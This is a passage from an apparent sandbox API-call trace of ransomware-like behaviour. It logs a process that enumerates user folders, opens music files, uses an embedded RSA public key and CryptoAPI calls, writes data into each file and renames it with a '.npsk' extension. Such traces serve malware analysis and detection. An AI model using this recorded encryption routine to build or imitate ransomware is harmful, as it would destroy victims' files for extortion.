ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0215.671] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.671] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.671] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.671] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0215.671] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.671] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.671] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.672] PathFindFileNameW (pszPath="") returned="" [0215.672] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.672] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0215.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0215.672] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.672] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.672] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.673] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0215.673] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.673] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.673] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.673] PathFindFileNameW (pszPath="") returned="" [0215.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.673] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.673] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.673] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0215.673] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0215.674] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0215.674] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0215.674] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0215.674] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0215.674] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0215.674] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0215.674] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.674] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.674] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.674] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0215.674] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.674] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.674] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.674] PathFindFileNameW (pszPath="") returned="" [0215.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0215.675] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.675] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0215.675] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.675] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.675] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.675] PathFindFileNameW (pszPath="") returned="" [0215.675] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9a2c7e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9a2c7e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.675] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9a2c7e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9a2c7e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.675] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.675] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0215.675] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ccb5200, ftCreationTime.dwHighDateTime=0x1d5e7a2, ftLastAccessTime.dwLowDateTime=0xd3ad3c50, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xd3ad3c50, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x7f32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q3Twxk8PpGFDv1c.mp3", cAlternateFileName="Q3TWXK~1.MP3")) returned 1 [0215.675] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Q3Twxk8PpGFDv1c.mp3") returned=".mp3" [0215.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Q3Twxk8PpGFDv1c.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\q3twxk8ppgfdv1c.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.676] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=32562) returned 1 [0215.676] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.678] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7f0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.678] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.680] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7f32, lpOverlapped=0x0) returned 1 [0215.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.680] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.681] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.681] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.682] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.682] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.682] GetLastError () returned 0x0 [0215.682] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.682] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.682] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.682] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.682] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.682] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.682] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7f32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.683] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.683] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.683] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.683] CloseHandle (hObject=0x61c) returned 1 [0215.687] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Q3Twxk8PpGFDv1c.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\q3twxk8ppgfdv1c.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Q3Twxk8PpGFDv1c.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\q3twxk8ppgfdv1c.mp3.npsk")) returned 1 [0215.689] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf370260, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x41352620, ftLastAccessTime.dwHighDateTime=0x1d5dcf8, ftLastWriteTime.dwLowDateTime=0x41352620, ftLastWriteTime.dwHighDateTime=0x1d5dcf8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tCN4", cAlternateFileName="")) returned 1 [0215.689] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa348480, ftCreationTime.dwHighDateTime=0x1d5dc86, ftLastAccessTime.dwLowDateTime=0xed26df20, ftLastAccessTime.dwHighDateTime=0x1d5e61f, ftLastWriteTime.dwLowDateTime=0xed26df20, ftLastWriteTime.dwHighDateTime=0x1d5e61f, nFileSizeHigh=0x0, nFileSizeLow=0xb1bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zlzVO4InXVjGcjVW.m4a", cAlternateFileName="ZLZVO4~1.M4A")) returned 1 [0215.689] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zlzVO4InXVjGcjVW.m4a") returned=".m4a" [0215.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zlzVO4InXVjGcjVW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zlzvo4inxvjgcjvw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.690] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=45500) returned 1 [0215.690] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.692] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb196, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.692] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.693] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xb1bc, lpOverlapped=0x0) returned 1 [0215.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.694] lstrlenA (lpString="-----BEGIN PUBLIC 